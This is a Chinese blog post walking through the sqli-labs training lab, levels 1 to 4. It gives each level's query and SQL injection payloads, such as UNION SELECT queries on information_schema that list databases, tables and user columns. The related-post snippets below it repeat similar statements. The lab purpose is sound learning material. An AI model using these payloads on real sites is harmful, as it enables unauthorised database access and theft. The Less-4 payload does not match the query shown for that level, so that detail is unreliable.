sqli-lab教程 less-1至4

已于 2022-07-06 15:46:56 修改
阅读量112 收藏
点赞数 1
文章标签: 数据库
于 2022-07-06 08:59:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaoyuhensuai/article/details/125499153
版权

Less-1

查找原SQL语句:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";


尝试是否可以注入:?id=1        正常显示

                         ?id=1'        报错

                         ?id=1’--+   正常显示

                         ?id=1' and 1=1 --+    正常显示

测试表中有多少字段:?id=1' order by 1 --+    正常

                                                ..................

                                    ?id=1' order by 4 --+    报错

可以得知数据表中拥有3个字段

对数据库进行查找:?id=1000' union select 1,2,database() --+

可以知晓库名为:security

显示全部的数据库:?id=1000' union select 1,group_concat(schema_name) ,3 from information_schema.schemata --+

显示当前数据库中所有的数据表:?id=1000' union select 1,group_concat(table_name) ,3 from information_schema.tables where table_schema='security' --+

显示users中的字段:?id=1000' union select 1,group_concat(column_name) ,3 from information_schema.columns where   table_name='users' and table_schema='security'  --+   

Less-2

查找原SQL语句:$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

与Less-1的语句对比可以知晓只需把?id=1'改为?id=1即可

Less-3

查找原SQL语句:$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

与Less-1的语句对比可以知晓只需把?id=1'改为?id=1')即可

Less-4

查找原SQL语句:$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

与Less-1的语句对比可以知晓只需把?id=1'改为?id=1")即可

xiaoyuhensuai
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sqli-lab刷题Less-1
MichealCurry1的博客
10-05 186
sqli1-lib刷题Less-1 本人是一名小白,刚开始进行web学习。 打开sqli-lib的Less-1,观察其页面。 可以看到,其页面提示输入id值,在url输入?id=1,提交id=1的参数,并且结合其给的提示,探测出其为单引号型的sql注入 之后拼接sql语句,在url输入?id=1’ order by 4 --+,order by会对列名称进行排序,多次试验发现为4时候报错,3不报错,证明该表名有3个字段 之后使用联合查询...
MySQL基本查询语句/Sqli-labs-master Less-1练习
weixin_44727454的博客
04-18 2644
简单SQL语句sqli-labs-master靶场第一关练习;
SQL注入之sqli-labs的Less1~10史上最详细通关教程
qq_49502930的博客
11-14 4347
SQL注入之sqli-labs详细通关教程 首先需要准备好火狐浏览器(方便下载hackbar这个插件)还有phpstudy搭建,以及sqli-labs搭建。其次,我们需要有一定的数据库基本语句基础,通关时有必要的语句我会解释,也希望大家可以自己在网上查找学习相关语句。 下面展示一些 基本语句。 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables w
sql注入详解
m0_73109590的博客
08-03 964
SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。...
sqli-lab教程Less-9
Brucye
03-23 381
less-9 sqli-lab通过各种方式(整型注入,字符注入,报错注入,布尔盲注,时间盲注,堆叠注入…)爆出库表字段拿到字段值。 时间盲注 学习sqli注入必备语句: 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables where table_schema=‘security’(此处拿security库为例) 查字段:select co
Sqli-lab:Less-1教程
m0_72286569的博客
01-28 534
1,当输入时会显示显示对应的Login name与Password,可以证明我们输入的内容是在数据库里面查询2,判断SQL语句是否是拼接a,当我们输入1’时会报错b,当我们输入1'--+时不会报错,就可以使用联合查询的方式进行sql注入。
sqli-lab教程 less-11,12
xiaoyuhensuai的博客
07-08 201
查找原SQL语句:$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1"这一题我们需要使用burp suite。首先我们在username和password随便输入一串数字或字母,如图所示:然后打开抓包,点击确认,进入repeater对数据进行改写。对数据库进行查找:把“uname=1111”改为“uname=1111' union select 1,data
sqli-lab教程Less-3
Brucye
03-23 271
less-3 sqli-lab通过各种方式(整型注入,字符注入,布尔盲注,时间盲注,堆叠注入…)爆出库表字段拿到字段值。 学习sqli注入必备语句: 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables where table_schema=‘security’(此处拿security库为例) 查字段:select column_name
sqli-lab教程——1-35通关
缘木之鱼
05-08 5707
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程使用到的大部分函数可以在我的sql注入入门必备基础知识找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges)Less-1 GET - Error...
第三节 Sqli-lab环境搭建-01
09-15
Sqli-lab环境搭建-01 在本节,我们将讨论如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是...
sqli-lab通关txt
07-22
sqli-lab1~10的通关txt,其包含了注入代码以及相关注解 代码由于存储在txt,无法直接复制使用,请手打。 (可能是由于编码问题)
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
sqli-lab注入练习源码
06-25
本套源码是sqli-lab,练习sql再好不过,将源码用phpstudy搭建即可开始练习
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
canal应用
qq_33816292的博客
06-12 134
canal分享模块链接。
源码编译安装LAMP
最新发布
潇的博客
06-12 866
LAMP 架构是目前成熟的企业网站应用模式之一,指的是协同工作的一整套系统和相关软件,能够提供动态Web站点服务及其应用开发环境。LAMP是一个缩写词,具体包括Linux操作系统、Apache网站服务器、MySQL数据库服务器、PHP(或Perl、Python)网页编程语言。本章将以源码编译的方式搭建LAMP环境,能够满足企业定制化的需求。在构建LAMP平台时,各组件的安装顺序依次为Linux、Apache、MySQL、PHP。其Apache和MySQL的安装并没有严格的顺序;
C#操作MySQL从入门到精通(16)——使用子查询
qq_34059233的博客
06-09 154
我们在查询数据的过程有时候查询的数据不是从数据库来的,而是从另一个查询的结果来的,这时候就需要使用子查询,本文进行详细介绍!
Django UpdateView视图
人生苦短,何妨一试
06-11 428
UpdateView是Django的一个通用视图,用于处理对象的更新操作。它允许用户更新一个已经存在的对象。UpdateView通常与一个模型表单一起使用,这样用户就可以看到当前对象的值,并可以修改它们。
sqli-lab安装
09-05
要安装sqli-lab,您需要按照以下步骤进行操作: 1. 首先,确保您具有Web服务器环境。您可以使用Apache、Nginx或其他适合您的环境的Web服务器。 2. 下载sqli-lab代码。您可以从GitHub存储库获取它,链接:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值